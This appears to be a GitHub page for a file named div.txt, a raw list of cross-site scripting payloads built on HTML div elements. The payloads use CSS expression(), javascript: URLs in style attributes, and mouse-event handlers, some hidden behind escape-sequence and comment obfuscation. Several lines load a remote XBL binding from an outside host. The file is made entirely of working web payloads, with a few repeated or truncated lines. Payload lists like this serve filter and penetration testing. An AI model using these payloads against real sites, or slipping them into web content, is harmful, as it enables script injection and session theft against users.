-
Notifications
You must be signed in to change notification settings - Fork 113
/
div.txt
48 lines (48 loc) · 3.74 KB
/
div.txt
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
<div/style=\-\mo\z\-b\i\nd\in\g:\url(//business\i\nfo.co.uk\/labs\/xbl\/xbl\.xml\#xss)>
<divstyle=\-\mo\z\-b\i\nd\in\g:\url(//business\i\nfo.co.uk\/labs\/xbl\/xbl\.xml\#xss)&>
<div    style=\-\mo\z\-b\i\nd\in\g:\url(//business\i\nfo.co.uk\/labs\/xbl\/xbl\.xml\#xss)>
<DIV STYLE="background-image: url(javascript:alert('XSS'))">
<DIV STYLE="background-image: url(javascript:alert('XSS'))">
<DIV STYLE="width: expression(alert('XSS'));">
<DIV STYLE="background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029">
<DIV STYLE="background-image: url(javascript:alert('XSS'))">
<DIV STYLE="background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029">
<DIV STYLE="background-image: url(javascript:alert('XSS'))">
<DIV STYLE="width: expression(alert('XSS'));">
<div/style="width:expression(confirm(1))">X</div> {IE7}
<div onmouseover='alert(1)'>DIV</div>
<input type="text" value=`` <div/onmouseover='alert(1)'>X</div>
<div/onmouseover='alert(1)'> style="x:">
<div style="xg-p:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)" onclick="alert(1)">x</button>
<div style="font-family:'foo ;color:red;';">LOL
<DIV STYLE=\"background-image: url(javascript:alert('XSS'))\">
<DIV STYLE=\"background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029\">
<DIV STYLE=\"background-image: url(javascript:alert('XSS'))\">
<DIV STYLE=\"width: expression(alert('XSS'));\">
<DIV STYLE="background-image: url(javascript:alert('XSS'))">
<DIV STYLE="background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029">
<DIV STYLE="width: expression(alert('XSS'));">
<DIV id=XSS STYLE="background-image: url(javascript:alert('XSS'))">
<DIV id=XSS STYLE="width: expression(alert('XSS'));">
<DIV id=XSS STYLE="background-image: url(javascript:alert('XSS'))">
<DIV id=XSS STYLE="width: expression(alert('XSS'));">
<DIV STYLE="background-image: url(javascript:alert('XSS'));">
<div onmouseover="alert('XSS');">,
<DIV id=XSS STYLE="binding: url(javascript:alert('XSS'));">
<div datafld="b" dataformatas="html" dataid=XSS SRC="#XSS"></div>
<DIV STYLE="background-image: url(javascript:alert('XSS'))">
<DIV STYLE="background-image: url(javascript:alert('XSS'))">
<DIV STYLE="width: expression(alert('XSS'));">
<div style="x:expression(alert(1))">Joker</div>
<div style="x:\65\78\70\72\65\73\73\69\6f\6e(alert(1))">Joker</div>
<div style="x:\000065\000078\000070\000072\000065\000073\000073\000069\00006f\00006e(alert(1))">Joker</div>
<div style="x:\65\78\70\72\65\73\73\69\6f\6e\028 alert \028 1 \029 \029">Joker</div>
<div style="z:exp/*anything*/res/*here*/sion(alert(1))" />
<div id="alert(/@0x6D6172696F/)" style="x:expression(eval)(id)">
<div style="color:rgb(''�x:expression(alert(URL=1))"></div>
<div id=d><x xmlns="><body onload=alert(1)"><script>d.innerHTML=‘’</script
<div style="x:expression((window.r==1)?'':eval('r=1;
<div/style="width:expression(confirm(1))">X</div> {IE7}
<div/onmouseover='alert(1)'> style="x:">
<div style="position:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)" onclick="alert(1)">x</button>
<div onmouseover='alert(1)'>DIV</div>